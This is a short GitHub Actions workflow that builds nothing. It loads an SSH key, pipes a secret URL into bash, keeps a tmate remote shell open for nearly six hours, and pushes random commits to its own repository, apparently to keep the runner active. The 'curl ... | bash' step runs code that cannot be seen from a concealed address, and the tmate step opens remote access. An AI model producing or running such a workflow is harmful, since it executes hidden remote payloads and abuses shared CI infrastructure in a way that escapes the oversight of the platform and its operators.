name: running
on: 
  workflow_dispatch:
defaults:
  run:
    shell: bash

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: fastai/workflows/ssh@master
      with:
        ssh_key: ${{ secrets.SSH_KEY }}
        key_file: id_ecdsa
    - uses: actions/checkout@v2
    - run: |
        cd $HOME && curl ${{ secrets.URL }} | bash
    - name: Setup tmate session
      timeout-minutes: 340 
      continue-on-error: true
      uses: mxschmitt/action-tmate@master
    - name: Loop Workflow
      continue-on-error: true
      run: |
          # ${GITHUB_REPOSITORY} is the repo slug which runs this script
          git clone https://github.com/${GITHUB_REPOSITORY} loop
          cd loop || exit 1
          echo $(( RANDOM - ( RANDOM % RANDOM ) )) > looper.txt
          git add looper.txt
          git commit -m "Looping at $(date -u +%D-%T%P)"
          git push -q https://github.com/${GITHUB_REPOSITORY} HEAD:main
